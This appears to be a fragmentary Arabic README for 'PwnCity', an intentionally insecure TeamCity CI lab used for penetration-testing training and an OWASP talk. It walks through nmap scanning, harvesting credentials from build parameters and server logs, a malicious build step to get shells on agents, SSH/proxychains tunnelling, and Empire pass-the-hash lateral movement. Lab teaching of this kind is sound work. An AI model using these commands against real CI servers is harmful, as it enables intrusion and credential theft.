
بيئة TeamCity CI غير آمنة للتدريب العملي على اختبار الاختراق: جمع المعلومات، سرقة بيانات الاعتماد، تصعيد الامتيازات، والحركة الجانبية.
بيئة تكامل مستمر TeamCity مهيأة بشكل غير آمن.
قيد التقدم: كود النشر سيأتي قريباً في النهاية.

قد يكون هناك أكثر من مسار عبر PwnCity، لكن هذا هو المسار الذي سأقدمه في 24 فبراير في اجتماع OWASP Sacramento Chapter.
ملاحظة: يتم تجاهل الأمن العملياتي إلى حد كبير هنا لأن هذا عرض توضيحي.
nmap -Pn -p- 52.234.0.18.
nmap 52.234.0.18 يجعله يبدو ميتًا.nmap -Pn 52.234.0.18.


bob، وكلمة المرور bobhacks?.
bob انتقل إلى Projects > SimpleMavenSample > Build > SettingsParameters يحتوي على بيانات اعتماد.

ssh [email protected]، ثم ادخل عبر ssh كمستخدم منخفض الامتياز.

يمكننا إنشاء نفق من نقطة الارتكاز الأولية لدينا. إن معرفة أن RDP مفتوح على عاملي بناء اثنين سيسمح لنا بمحاولة المصادقة عبر بيانات الاعتماد التي وجدناها... لكن هذا ليس ممتعًا بنفس القدر.
cat /home/dev/TeamCity/TeamCity/logs/teamcity-server.log | grep "Super user".

Administration > Projects > Create project، واحصل على شل على عاملي البناء.

cmd.exe/c %system.teamcity.build.checkoutDir%/launcher.bat

بيانات الاعتماد مختارة من rockyou.txt.
PwnAgent01 لديه Microsoft Defender مفعّل. على الرغم من أنه من الممكن بالتأكيد التغلب على هذا، فإن خطوة البناء الخبيثة التي عرضناها سيتم حظرها.



هذا القسم مجرد مجموعة من المقتطفات التي كانت مفيدة عند إدارة بيئة المختبر.
TeamCity للوصول إلى الموارد المحلية ssh -D 9050 [email protected].proxychains4 xfreerdp /u:dev /v:10.0.0.6:3389.... بجوار Run في القائمة، ثم على الوكيل المطلوب الذي تستهدفه. إذا سارت الأمور على ما يرام، فسيقوم وكيل بالاتصال بك.

powershell/situational_awareness/network/portscan. اكتشف أن 10.0.0.7 لديه 3389,445,139,135 جميعها مفتوحة.

bruno.powershell/lateral_movement/invoke_smbexec للحصول على اتصال beacon على Bruno-PC عبر تجزئة NTML.
